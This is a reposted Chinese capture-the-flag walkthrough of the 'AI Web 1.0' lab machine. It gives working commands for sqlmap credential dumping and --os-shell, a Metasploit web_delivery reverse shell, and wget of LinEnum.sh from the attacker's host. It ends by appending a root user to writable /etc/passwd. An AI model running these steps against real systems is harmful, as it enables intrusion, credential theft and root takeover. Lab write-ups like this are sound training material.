zoukankan
html css js c++ java
AI Web 1.0
kali:192.168.0.103
目标机:192.168.0.105
0X01 端口和目录扫描
打开目标主页没有任何信息
a) 端口扫描
只有一个80端口开启
b) 目录扫描
0x03 查看敏感目录robots
访问敏感目录地址
两个目录都没有权限访问
尝试继续挖掘
在http://192.168.0.105/m3diNf0下发现info.php文件记录这各种php信息
在
http://192.168.0.105/se3reTdir777/uploads/
没有挖到任何目录,此时回过头来看看上一级目录是什么
是一个查看信息输入框。
结合现在所得到的信息,能想到的只有输入框是否有sql注入
0X04 SQL注入
a) 验证漏洞是否存在
将1'带入输入框后报错,说明将1'数据带入到数据库了,是有注入点的
b) sqlmap跑数据库
抓包生成re.txt文件
运行sqlmap
sqlmap -r /root/re.txt --dbs --batch
最终得到的数据库账号密码
sqlmap -r /root/re.txt -D aiweb1 -T systemUser -C userName,password --batch
由此我们得到了凭证
0X05 sqlmap get webshell
sqlmap -r /root/re.txt --os-shell
这里选用自定义地址,必须是目标网站的真是物理地址,结合之前得到的phpinfo信息
网站根路径/home/www/html/web1x443290o2sdf92213
出现错误,可能是没有写入权限,试了试已知的几个路径发现/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/可以写入成功
0X06 系统提权
a) 反弹交互式shell
使用命令执行的方式获取反弹shell
use exploit/multi/script/web_delivery
b) 获取系统及文件信息 (使用脚本LinEnum.sh,kali开启web服务)
cd /tmp wget "http://192.168.0.103/LinEnum.sh" chmod +x LinEnum.sh ./LinEnum.sh -e /tmp
执行完上述命令后查看生成的报告,查看文件夹,以外的发现/etc/passwd对当前用户来说是可读可写可执行
c) 编辑passwd文件 添加root权限用户
perl -le 'print crypt("password@123","addedsalt")' echo "test:生成的密码:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
切换用户 su test
密码 password@123
查看全文
相关阅读:
iframe引入网页
input同名
混合框架
<header><footer>引用
<dl>
凸包性质——cf1044C
几何求叉积+最短路——cf1032D
fresco 设置资源路径时的一个坑
马拉车+贪心——cf1326D
【模板变形】凸壳二分+斜率优化dp——cf1083E
原文地址:https://www.cnblogs.com/sup3rman/p/12310328.html
最新文章
fedora之防火墙
关于hadoop的环境变量
md5sum使用总结
xml格式化
各种不会。。。。编译和安装hadoop过程中好多命令和工具不会
2016ACM/ICPC亚洲区沈阳站H
LightOJ
HDU
HDU
hdu4347The Closest M Points kdtree
热门文章
zoj4028 LIS,差分约束
bzoj1005: [HNOI2008]明明的烦恼 prufer序列
bzoj1096: [ZJOI2007]仓库建设 斜率优化dp
1004: [HNOI2008]Cards burnside定理
1030: [JSOI2007]文本生成器 ac自动机+dp
JavaScript for...in 循环
javascritpt创建对象
continue和break区别
向未声明的 JavaScript 变量来分配值
Value = undefined
Copyright © 2011-2022 走看看